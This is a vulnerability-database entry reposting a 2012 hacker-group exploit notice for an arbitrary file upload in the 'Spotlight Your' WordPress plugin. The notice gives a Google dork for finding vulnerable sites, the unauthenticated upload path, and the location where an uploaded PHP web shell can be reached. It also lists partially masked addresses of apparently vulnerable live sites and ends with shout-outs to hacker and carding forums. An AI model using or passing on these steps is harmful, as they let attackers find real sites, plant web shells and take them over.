Wordpress Plugins Spotlight Your Upload Vulnerability

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1046119 漏洞类型
发布时间 2012-11-18 更新时间 2012-11-18
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2012110121
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
INDO-PENDENT HACKER
http://thecrowscrew.org
###########################
Exploit Title: Wordpress Plugins Spotlight Your Upload Vulnerability
Google Dork: inurl:"/wp-content/plugins/spotlightyour/"
Date: 18/11/2012
Locations: Banjarmasin, Indonesia
Author: ovanIsmycode & walangkaji
Contact: rootx@thecrowscrew.org & walangkaji@thecrowscrew.org
Software Link: http://www.spotlightyour.com
###########################
 
[+] POC
 
Exp. Target :
- http://domain.com/wp-content/plugins/spotlightyour/
 
Exploit :
- /monetize/upload/index.php
 
Shell Access : 
- http://domain.com/wp-content/uploads/[year]/[month]/[search your shell].php
 
Ending :
- Fraksi Bejoug a.k.a Kalam Saheru
Saparatoss Blank Blank
awkwkwkwk :v
 
http://beautXXXo.com/wp-content/plugins/spotlightyour/monetize/upload/
 
http://www.XXXotion.com/wp-content/plugins/spotlightyour/monetize/upload/
 
http://sXXXXinister.com/wp-content/plugins/spotlightyour/monetize/upload/
 
###########################

Spec!4L th4nk'5 to :
MsconfiX, Catalyst71, Gabby, din_muh, don_ojan, DendyIsMe, kit4r0, 777r, ph_ovtl4w, adecakep7,
penjamoen, -=[The Crows Crew]=-, Indonesian Hacker
 
thecrowscrew.org, hacker-newbie.org, yogyacarderlink.web.id, devilzc0de.org
 
###[end]###